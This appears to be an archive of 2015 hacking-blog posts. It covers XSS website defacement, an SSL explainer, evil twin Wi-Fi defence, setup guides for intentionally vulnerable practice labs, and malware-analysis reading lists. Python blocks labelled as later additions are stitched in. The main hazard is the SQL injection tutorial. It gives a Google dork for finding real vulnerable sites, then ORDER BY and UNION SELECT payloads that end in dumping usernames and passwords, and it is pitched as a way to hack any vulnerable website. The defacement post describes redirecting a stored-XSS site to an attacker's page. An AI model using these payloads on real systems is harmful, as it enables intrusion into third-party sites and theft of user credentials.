Friday, April 24, 2015

How to deface a website with Cross Site Scripting: Complete XSS Tutorial

This is my third article in the Cross Site Scripting tutorial series. Last time, I explained how to test for an XSS vulnerability and some filter bypassing techniques. Now let us see how a hacker defaces a website with an XSS vulnerability. Never implement this technique; I am explaining it for educational purposes only.

Defacing is one of the most common things a hacker does after finding a vulnerability in a website. Defacing means replacing the content of the website with the hacker's own content. Most of the time, attackers use this technique to inform the admin about the vulnerability. But it's a bad idea..!

Script for changing the background color of a website:

Script for changing the background image of a website:

Defacement page with Pastehtml: First of all, upload a defacement page (HTML) to pastehtml.com and get the link. When you find an XSS vulnerable site, insert the script as:

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent (stored) XSS vulnerable sites.

Wednesday, April 15, 2015

Secure Sockets Layer Tutorial | What is SSL | SSL Hackers Guide

You might have heard that you should not enter your password, credit card information or any other sensitive information on public computers, or in Facebook, Yahoo and similar chats. The reason is that hackers have ways to steal your credit card numbers, passwords and so on.




A hacker can use different types of attacks such as Packet sniffing or ARP Poisoning to steal your sensitive information.

Secure Sockets Layer (SSL) is the most widely used technology for creating a secure communication channel between a web client and a web server. You must be familiar with the http:// and https:// protocols and might be wondering what they mean. HTTP is used for standard communication between the web server and the client; HTTPS is used for secure communication.


Cryptography


If two users want to communicate securely, they can also use cryptography to accomplish it.

For example: 

TFDVSF=Encrypted Text

SECURE= Decrypted Text

You might be wondering how I decrypted it. Here I have used a shift algorithm ("+") with the key "1": the letter that comes after S is T, so S is converted into T; the letter that comes after E is F, so the E in the word SECURE is converted into F; and so on. To help you understand this better, I am adding a video –






So if a hacker starts sniffing from the middle of the conversation, he will only get the encrypted text, and since he does not know the key he cannot decrypt it. But if the attacker is sniffing from the starting point, he will capture the key too and can easily decrypt the data.
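The shift cipher from the SECURE/TFDVSF example, written out as an added Python example (not part of the original post) so both sniffing positions above can be tried: with the captured key the eavesdropper decrypts directly, and the last function shows that even without the key the 26-value key space can simply be enumerated, which is why this toy cipher is only an illustration and not what SSL actually does.

```python
import string

ALPHABET = string.ascii_uppercase


def shift_encrypt(plaintext: str, key: int) -> str:
    """Replace each letter by the one `key` places later in the alphabet (Z wraps to A).
    With key=1 this is the tutorial's "+" algorithm: SECURE -> TFDVSF."""
    out = []
    for ch in plaintext.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + key) % 26])
        else:
            out.append(ch)  # spaces and punctuation are passed through unchanged
    return "".join(out)


def shift_decrypt(ciphertext: str, key: int) -> str:
    """Undo shift_encrypt: what a sniffer who captured the key from the start can do."""
    return shift_encrypt(ciphertext, -key)


def all_candidate_plaintexts(ciphertext: str) -> dict:
    """What a sniffer WITHOUT the key can still do: there are only 26 possible keys,
    so every candidate plaintext can be listed and the readable one picked by eye.
    A real protocol uses keys far too large to enumerate this way."""
    return {k: shift_decrypt(ciphertext, k) for k in range(26)}


if __name__ == "__main__":
    ct = shift_encrypt("SECURE", 1)
    print(ct)                    # TFDVSF, as in the tutorial
    print(shift_decrypt(ct, 1))  # SECURE: sniffer holding the key
    for k, pt in all_candidate_plaintexts(ct).items():
        print(k, pt)             # sniffer without the key: only 26 guesses needed
```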




Standard Communication VS Secure communication 


Suppose there exist two communicating parties, A (client) and B (server).


Standard communication(HTTP)


When A sends information to B, it is sent unencrypted. This is acceptable if A is not sharing confidential information, but if A is sending sensitive information, say a password, that will also be sent in unencrypted form, and if a hacker starts sniffing the communication he will get the password.

This scenario is illustrated using the following figure -



Standard Communications HTTP



Secure communication(HTTPS) 


In a secure communication, i.e. HTTPS, the conversation between A and B happens inside a protected tunnel. The information that user A sends to B is encrypted, so even if a hacker gains unauthorized access to the conversation he will receive only the encrypted password (“xz54p6kd“) and not the original password.
This scenario is illustrated using the following figure –


Secure communication(HTTPS)




How is HTTPS implemented?


HTTPS is implemented using Secure Sockets Layer (SSL). A website can enable HTTPS by purchasing an SSL certificate.

Which websites need SSL Certificate?


Websites where private conversations take place, websites handling online transactions, and any website where other sensitive information needs to be protected need an SSL certificate.




How to identify a Secure Connection?


In Internet Explorer and Google Chrome, you will see a lock icon in the security status bar, which is located on the right side of the address bar. You can click the lock to view the identity of the website.

If you are making an online transaction with a credit card or by any other means, you should check that https:// secured communication is enabled.

Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks – Part 8

An SQL Injection flaw is quite easy to exploit, and also to protect against, but only when you know how to do it. Continuing our Injection attacks tutorial series, today we will learn about the Union Exploitation Technique to exploit an SQL Injection vulnerability. The union exploitation technique is the most common and easiest way to exploit an SQL injection vulnerability to hack into websites, and if you know how to do it then the same knowledge works the other way around, i.e. protecting an SQL Injection vulnerability from being exploited by the union technique. So let's learn about the Union Exploitation Technique in detail with the help of examples.
Note: This article is for education purposes only. Any misuse may lead to harsh cyber law charges and even imprisonment.
But before that, let me brief you on what the Union operator is. UNION is a built-in keyword in almost all databases that is used to combine the results of two queries. In SQL, we normally use the UNION operator to link another SQL query with the original query. Hackers use this concept to exploit SQL Injection flaws to run their own SQL queries and retrieve information such as usernames, passwords and other juicy information from the victim's database.
Here's a brief outline of the procedure we are going to learn to exploit SQL Injection using the Union Exploitation Technique:
1. Find a website which is vulnerable to SQL Injection.
2. Find the number of columns using the ORDER BY clause.
3. Find the vulnerable columns that can be used to exploit the SQL Injection vulnerability using the UNION operator.
4. Do a test run to validate that the column found is vulnerable by querying the version information.
5. Use the information schema to get table names.
6. Use the information schema to get column names.
7. Use the information schema to get column values, for example usernames, passwords, customer information.
Oops... that's it, that's all there is to the Union Exploitation technique for exploiting an SQL injection vulnerability to own or hack any vulnerable website. Now let's learn in detail how to use the technique.

Union Exploitation Technique to Exploit SQL Injection Vulnerability:

Step 1: Finding SQL injection vulnerable websites:

We have already learned this in our previous articles; if somebody missed it, here is a brief recap:
Use Google to find vulnerable websites by searching for the query below:
inurl:php?id=
There are several other dorks to find SQL injection vulnerable websites, but the one above is the easiest, with a success rate of almost 90-95%.
Now the Google search will display some results. Open any one of them, say
www.example.com/shop.php?id=6
Now, to check whether it is vulnerable to SQL Injection or not, just add a ' (single quote) at the end of it, i.e. the query will become something like below:
www.example.com/shop.php?id=6'
Now if you get an error something like below, it means the website is vulnerable to SQL Injection:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1
or something like below:
Query failed: You have an error in your SQL syntax near ”6”’ at line 1
or any other error.

Step 2: Finding Exact Number Columns in Website

Once you know the website is vulnerable to SQL Injection, the next step is to find the exact number of columns returned by the vulnerable query. You can find it by running the query below:
www.example.com/shop.php?id=6 ORDER BY <NUM>--
Now say the website has 16 columns, which you don't know yet; you can find it using a binary search approach, for example by running the sequence below:
www.example.com/shop.php?id=6 ORDER BY 10--
Result: some page opens with data, i.e. no error page. Then increment it by 10, i.e.
www.example.com/shop.php?id=6 ORDER BY 20--
and so on until you get the error message below:
Unknown column '<NUM>' in 'order clause'
or any other custom message. Once you get the above error, it means you have exceeded the exact column count, so decrease the number one by one until the error is gone. The last successful page gives the exact column count. Say you get 16 columns; then the last successful request executed must be:
www.example.com/shop.php?id=6 ORDER BY 16--
This step gives the exact number of columns in the query used by the website.

Step 3: Finding Vulnerable Columns using UNION ALL clause.

Once you know the exact number of columns, you can get the list of vulnerable columns by running the query below:
www.example.com/shop.php?id=6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
This will result in some page on which some numbers are displayed. Those are the vulnerable columns. Now say 2, 4 and 8 are displayed on the page: this means column 2, column 4 and column 8 are the columns that can be used to run your own SQL queries. If the above query shows the normal web page as it usually displays, it means the injected row is not being shown. Then we use the field exploitation technique by inserting '-' in front of the ID value, so the query becomes something like below:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Wow, now you have some numbers scattered over the web page, which are the vulnerable columns on the website.

Step 4: Test run to validate vulnerable columns

Now that we have the list of vulnerable columns, the next step is validating that we are correct. The easiest way to validate is executing the version() function in a vulnerable column. For example, say column 2 was vulnerable:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Now in place of 2 on the web page you will get the version number displayed. Check this for all vulnerable columns.

Step 5: Use information Schema to get Table Names

Now that we know the vulnerable columns, the next step is extracting table names from the database. This can be achieved by knowing the concepts of the information schema. Learn more about using the information schema to extract table names here:
http://dev.mysql.com/doc/refman/5.1/en/tables-table.html
Using the information schema we can read the database's metadata (its table and column names). So in order to extract table names we will run the query below on column 2 (the vulnerable column):
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema = database()--
The above query will give you the complete list of tables present in the database. You know which table you need to search for usernames and passwords :D.

Step 6: Use information schema to get Column names

Using the same concept as in step 5, we will use the information schema to extract column names too. Learn more about using the information schema to extract column names:
http://dev.mysql.com/doc/refman/5.1/en/columns-table.html
Now to extract column names from the database, the query below will work like a bullseye:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_schema = database()--
The above query will extract all column names.

Step 7: Use Information Schema concept to get column values of required table

Well, till now we have table names and column names. The only thing left is the data from the tables. Now say we found a table named USERS which has the columns USERNAME and PASSWORD. In order to extract data from the USERS table, the query below is sufficient:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from USERS--
The above query will display usernames and passwords in the format username:password, as 0x3a is the hex value of ':'. That's it guys, now you have the table names, usernames and passwords. What else do you need? That's all for today; we will continue to learn more about injection attacks in later tutorials. If you have any queries or doubts, feel free to ask.
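As an added Python example (not from the tutorial and not the shop.php code), here is the query-building pattern that steps 1 to 7 rely on beside its parameterised form, plus a small detector for the ORDER BY / UNION probe fingerprints over constructed access-log lines. The in-memory SQLite database, the users table contents and the log lines are all constructed stand-ins.

```python
import re
import sqlite3
from urllib.parse import unquote_plus


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the tutorial's shop.php backend."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, price TEXT)")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO products VALUES (6, 'Desk lamp', '12.00')")
    con.execute("INSERT INTO users VALUES ('admin', 'constructed-hash')")
    return con


def lookup_vulnerable(con, raw_id: str):
    """The shop.php pattern the tutorial exploits: the id parameter is glued into the
    SQL text, so 'ORDER BY n' or '-6 UNION ALL SELECT ...' become part of the query."""
    sql = "SELECT id, name, price FROM products WHERE id = " + raw_id
    return con.execute(sql).fetchall()


def lookup_safe(con, raw_id: str):
    """Hardened form: validate the type, then bind the value as a parameter.
    The database never parses user input as SQL, so steps 2-7 have nothing to act on."""
    try:
        pid = int(raw_id)
    except ValueError:
        return []  # "6'", "6 ORDER BY 10--", "-6 UNION ..." are rejected outright
    return con.execute("SELECT id, name, price FROM products WHERE id = ?", (pid,)).fetchall()


# Request fingerprints of the tutorial's steps 2-7, checked after URL decoding.
PROBE_PATTERNS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"information_schema\.", re.I),
}


def flag_probes(log_lines):
    """Return [(line_no, label)] for access-log lines carrying a probe fingerprint."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        decoded = unquote_plus(line)  # %20 and '+' both become spaces before matching
        for label, pat in PROBE_PATTERNS.items():
            if pat.search(decoded):
                hits.append((n, label))
                break
    return hits


# Constructed access-log lines mirroring the tutorial's requests (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Apr/2015:10:00:01 +0000] "GET /shop.php?id=6 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [24/Apr/2015:10:00:07 +0000] "GET /shop.php?id=6%20ORDER%20BY%2010-- HTTP/1.1" 200 5120',
    '203.0.113.5 - - [24/Apr/2015:10:00:15 +0000] "GET /shop.php?id=-6%20UNION%20ALL%20SELECT%201,2,3-- HTTP/1.1" 200 4800',
    '203.0.113.5 - - [24/Apr/2015:10:00:30 +0000] "GET /shop.php?id=-6+UNION+ALL+SELECT+1,group_concat(table_name),3+from+information_schema.tables-- HTTP/1.1" 200 4900',
]

if __name__ == "__main__":
    con = build_db()
    probe = "-6 UNION ALL SELECT 1, username, password FROM users--"
    print(lookup_vulnerable(con, probe))  # the users row comes back in place of a product
    print(lookup_safe(con, probe))        # [] : the probe never reaches the SQL parser
    print(flag_probes(SAMPLE_LOG))        # lines 2, 3 and 4 are flagged
```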

Wednesday, April 1, 2015

Evil Twin and Fake Wireless Access Point Hacks: What They Are, How To Defend

Hacking is a term with a wide variety of acts associated with it. Some are incredibly complex and demand a high degree of knowledge; others are little more than installing some software on your device and acting a bit... less than ethically. One of the most common hacks is also one of the easiest to defend against: the fake wireless access point. Hackers use this tactic to easily steal the data of unsuspecting wireless users in public places.

What is a fake wireless access point data theft?

This type of attack has a number of nicknames associated with it: AP Phishing, Wi-Fi Phishing, Hotspotter, Evil Twins, and Honeypot AP. All of them involve creating a fake Wi-Fi connection that people log into, with the goal of stealing credentials, logins, and passwords. To accomplish this, hackers simply use a piece of software, or app, that is designed to capture data sent over a wireless connection. Examples of software used during a fake Wi-Fi attack include:

* AirSSL
* AirJack
* Airsnarf
* Dsniff
* Cain
* void11

No matter which apps are used, the key to it all is setting up a wireless connection that people will want to connect to. When they go to connect to the wireless point they likely won't suspect a thing. Why? Because this tactic is used most often in public areas. If you were to go into your local Starbucks, sit down with your mocha latte venti with cream and sugar pumpkin spice, and open up your tablet, finding a connection labelled 'Starbucks Free WiFi', you'd probably connect in a heartbeat (one quickened by caffeine, at that). The same goes if you're on a layover at JFK and you see a connection labelled 'JFK Free Wi-Fi'. You wouldn't think twice. That's what the hackers are counting on: you not thinking.

How is your data stolen during a fake wireless access point theft?

How your most important data is stolen is a little shocking: you give it to them. A large percentage of these hacks take place with a fake wireless point that requires a login and password. Once that information is entered into the login, hackers take it and use it to sign into popular websites, assuming that you use the same login and password for multiple sites. When your online accounts start showing charges that you didn't initiate, or if your social media account is taken over, you could be the victim of a fake wireless access point data theft.

How to defend against an 'Evil Twin' attack?

There are a number of ways to defend against it; I'll look at some easy to understand examples:

* The best defence is to always verify with the wifi provider. Ask the Starbucks staff what their wi-fi is called; it can save you a massive headache. Always remember: if a deal seems too good to be true, like free wifi, it probably is.
* Use different login details and passwords for public wifi. Disable auto-connect when you're in unfamiliar territory.
* Be cautious when connections suddenly drop, especially if it happens for everyone on the network. A tool known as aireplay is capable of disconnecting users from wifi in the hope that they'll reconnect to the fake wifi.
* Be cautious of certificates. Good websites can occasionally send you one, but if this happens over a public wifi that you don't know, it is best to back off.
* If a wifi hotspot is interfering with your VPN, forcing you to shut it down, that is a HUGE red flag. A VPN is a great defence against this attack, and hackers know it. Forcing your VPN to disable when you're trying to connect is the only way that they can steal your data.

That last point is one I want to look at further. A VPN can be a great defence against this type of attack because it encrypts all of the data that you send out. With this data being encrypted, even when you create your login and password with the fake wifi, your data cannot be stolen because it cannot be deciphered.

We review our Top 10 VPNs over on our website if you're interested in learning more about them. A last option that I'll suggest is using SSL-protected apps. These do take more care and thought to use, but they will offer you protection that is similar to a VPN. Some hackers have even found a way around SSL protection (the BREACH method), so you may want to explore using this with a secondary defensive measure. The overall advice is to be cautious and verify before you connect. People look at me weird all the time when I ask for the correct wifi name that I should connect to. I've never been the victim of an 'Evil Twin' attack... I'll take a funny look or two.

Java Vulnerable Lab – Learn to Hack and secure Java based Web Applications

We (Cyber Security and Privacy Foundation) have developed a vulnerable Java based web application. This app is intended for Java programmers and other people who wish to learn about web application vulnerabilities and write secure code. The full course on Hacking and Securing Java Web Programs is available at https://www.udemy.com/hacking-securing-java-web-programming/

Warning: Don't run this app on your main machine or on an online server. Install it in a virtual machine.

How to set up Java Vulnerable Lab?

Method 1. Very Easiest Method: VirtualBox VM

The easiest way to use Java Vulnerable Lab is the VirtualBox VM, which has everything set up and ready to use. Steps:
1. Install VirtualBox: https://www.virtualbox.org/wiki/Downloads
2. Download the VM image from here: http://sourceforge.net/projects/javavulnerablelab/files/v0.1/JavaVulnerableLab.ova/download
3. Import the JavaVulnerable.ova into VirtualBox.
4. Change the network settings to Host-Only Network.
5. Start the machine and log into it (credentials: username root, password cspf).
6. Start Tomcat by entering "service tomcat start" in the terminal.
7. Start MySQL by entering "service mysql start" in the terminal.
8. Find the IP address of the machine.
9. In your browser, go to http://[IP_ADDRESS_OF_VM]:8080/JavaVulnerableLab/install.jsp
10. Click the Install button.
11. Enjoy :)

Method 2. Easiest Method: Standalone Web Application

In this method, you will be running an executable JAR file which runs the application with an embedded Apache Tomcat. Steps:
1. Install the JDK.
2. Download the executable JAR from here: http://sourceforge.net/projects/javavulnerablelab/files/v0.2/JavaVulnerableLab.jar/download
3. Double-click JavaVulnerable.jar to run it (if double-clicking does not work, run the command "java -jar JavaVulnerable.jar" in your terminal or CMD).
4. In your browser, go to http://localhost:8080/JavaVulnerableLab/install.jsp
5. Click the Install button.

Method 3. Using the WAR file

This is the normal method: deploy the WAR file. Steps:
1. Install the Apache Tomcat server.
2. Go to http://[Tomcat_INSTALLED_IP]:8080/manager/ (make sure you have modified Tomcat's tomcat-users.xml to allow the manager).
3. Download our WAR file from here: https://sourceforge.net/projects/javavulnerablelab/files/latest/JavaVulnerableLab.war/download
4. Deploy the WAR in the Apache Tomcat manager.
5. Go to http://[Tomcat_INSTALLED_IP]:8080/JavaVulnerableLab/install.jsp
6. Click the Install button.

You can contribute to or get the source code of Java Vulnerable Lab from here: https://github.com/breakthesec/JavaVulnerableLab

BTS PenTesting Lab – a vulnerable web application to learn common vulnerabilities

The most common question from students learning website hacking techniques is "how do I test my skills legally without getting into trouble?". So I always suggest they use a vulnerable web application such as DVWA. However, I felt DVWA is not suitable for new and advanced techniques. Mutillidae is one of the best vulnerable web applications to date; however, I missed some techniques/features in Mutillidae. So I thought it would be better to develop our own app to teach web application pentesting to my readers and students.

BTS PenTesting Lab is a vulnerable web application that allows you to learn from basic to advanced vulnerability techniques. Currently, the app contains the following vulnerability types:
* SQL Injection
* Cross Site Scripting (XSS)
* Cross Site Request Forgery (CSRF)
* Clickjacking
* Server Side Request Forgery (SSRF)
* File Inclusion (RFI and LFI)
* Command Execution

You can download our app from here: https://sourceforge.net/p/btslab/ or https://github.com/breakthesec/btslab

How to run BTS PenTesting Lab?
1. Install XAMPP or WAMP on your machine.
2. Extract the bts_lab zip file into the htdocs folder.
3. Open the http://localhost/bts_lab/setup.php URL in your browser.
4. Click Setup.

That's all. Now you can start to use the app at http://localhost/bts_lab

List of Best sites to learn Malware Analysis

Are you interested in learning malware analysis and searching for the best resources? Ok, I will give you the list of sites where you can learn malware analysis.

Resources for learning Malware Analysis

Malware Analysis Tutorials: a Reverse Engineering Approach
A series of malware analysis tutorials written by Dr. Xiang Fu. In this blog, you will learn how to set up your malware analysis lab and do the code analysis part using Immunity Debugger.
Link: Dr. Fu's Security Blog

Step-by-Step Reverse Engineering Malware: ZeroAccess / Max++ / Smiscer Crimeware Rootkit
This four-part article series is a complete step-by-step tutorial on how to reverse engineer the ZeroAccess rootkit.
Link: InfoSec Institute

Practical Malware Analysis Tutorials
This page contains a series of malware analysis tutorials that demonstrate how to dissect different malware samples.
Link: Tutorial from Malware.lu

Sinowal analysis
The full analysis report of Sinowal. Sinowal (also known as Torpig or Anserin) has consistently been one of the top banking trojans all over the world since 2006.
Link: http://www.evild3ad.com/?p=1556

Analysis of Shylock Trojan
Shylock is a new Trojan discovered by Trusteer around 2 months ago. It is designed to be a Trojan spy and specifically a banker. It targets the Windows platform, collects various system information from the infected system and sends it to a remote C&C server, and is able to perform man-in-the-browser attacks (IE and FF) against users of UK banks.
Link: http://p4r4n0id.com/